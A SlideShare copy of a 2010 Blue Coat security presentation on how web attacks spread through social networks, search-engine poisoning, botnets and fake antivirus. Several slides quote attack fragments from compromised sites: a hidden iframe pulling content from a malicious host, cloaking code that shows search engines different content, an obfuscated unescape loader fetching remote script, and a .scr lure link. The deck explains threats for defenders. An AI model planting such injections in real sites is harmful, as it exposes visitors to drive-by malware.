2010-11 The Anatomy of a Web Attack

3,085 views
3,039 views

Published on

2010-11 The Anatomy of a Web Attack
by Dennis Pike, Systems Engineer, Bluecoat Systems

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
3,085
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
14
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

2010-11 The Anatomy of a Web Attack

  1. 1. The Anatomy of a Web AttackDennis PikeSystems EngineerGeo Specialists Lead – Americas Securitydennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
  2. 2. Agenda  State of the Web • Top categories • Top attacks  The Anatomy of a Web Attack • Lures to web threats • Examples  Dynamic Link Analysis2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  3. 3. Best of the Worst  Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity  Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc.3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  4. 4. Email vs Social Networking  Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  5. 5. Domain: Client% Domain: Client% Noteworthy Items ~Total~: youtube.com: 100% 35.7800 ~Total~: youtube.com: 100.00% 36.28 hotfile.com: 7.427 rapidshare.com: 6.36Argument for Video (HTTP and Streaming) apple.com: 4.901 hotfile.com: 5.26 ninjacloak.com: 4.205 apple.com: 3.98 rapidshare.com: 4.135 ninjacloak.com: 3.97 megaupload.com: 2.977 megaupload.com: 2.54 googlevideo.com: 2.66 googlevideo.com: 2.33 fbcdn.net: 1.791 fbcdn.net: 1.85 mediafire.com: 1.492 fileserve.com: 1.75 windowsupdate.com: 1.305 playstation.net: 1.74 playstation.net: 1.241 mediafire.com: 1.68 fileserve.com: 1.187 windowsupdate.com: 1.42 4shared.com: 1.031 zshare.net: 0.78 zshare.net: 0.7793 facebook.com: 0.65 dailymotion.com: 0.6476 dailymotion.com: 0.62 google.com: 0.588 4shared.com: 0.6 facebook.com: 0.5764 novamov.com: 0.54 novamov.com: 0.5737 google.com: 0.54 microsoft.com: 0.4747 farmville.com: 0.52 farmville.com: 0.4626 adobe.com: 0.41 video filesharing © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  6. 6. Changing Web Habits Top 10 Categories – 2009 Social Networking WebFilter/WebPulse, 62M+ Users Moved to #1 from #2 position 1. Social Networking Represents 25% of Top10 requests 2. Web Advertisements 3. Search Engines/Portals Web Email 4. Personals/Dating Dropped to #9 from #5 position 5. Pornography Users migrating to social networking 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content Cyber Crime Leverages 9. Web Email Search engine poisoning 10. Illegal/Questionable Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  7. 7. Web Threats Rising Exponentially  2/3 of all known malicious code threats in 1 year (Symantec April’09)  1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  8. 8. Distribution Power  Botnet computing power to: Pitch worthless products Hijack online banking accounts Top 5 Steal corporate data Botnets in 2009 Botnet Zeus Koobface B Koobface D Monkif A Clickbot Peak 1,070,000 number 812,000 599,000 of active 506,000 bots 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 20108 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  9. 9. An Invitation to Crime 2 – Program messages user’s friends asking 3 – Anyone who clicks them to click on a link on the link is asked to to a photo or video. enable a media player needed to see the images. Running the file turns the PC into 1 – An automated a bot. program logs on to social network using stolen user 4 – The bot steals the PC credentials. owners logon credentials, starting the cycle again. USA TODAY Research – March 20109 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  10. 10. Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  11. 11. Multi-Host Pages SPORT 6 Domains 13 Hosts 147 Requests 504 KB 14.5 Seconds11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  12. 12. Paths to Malware Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  13. 13. End User…Infected Site www.inka.com <html> … <iframesrc="http://ho menameregistration. cn/in.cgi?income12" width=1 height=1 style="visibility: homenameregistration.cn/in.cgi?income12 hidden"></iframe><d iv id=“header”> … </html>13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  14. 14. Web 2.0 and Search Engines Forums Blogs Search Wikis WWW Engine View Guestbooks14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  15. 15. Web 2.0 and Search Engines Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links…15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  16. 16. 16 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  17. 17. 17 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  18. 18. Hijacked Website if (“search engine”) { xdesignstudios.com echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” dir1 } index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  19. 19. End User…Search Engine Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> document.write(unes live.js cape(%3C%53%43 %52%49%50%54% 20%20%20%20%6C %61%6E%67%75… http://cracksinside.com/red/gen.js19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  20. 20. What just happened? Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… Redirect20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  21. 21. Recent Examples - VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocument s.com/library/PDF_D ocument21.0255420 10.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  22. 22. Recent Examples – Fake Warez22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  23. 23. © Blue Coat Systems, Inc. 2010. All Rights Reserved.

×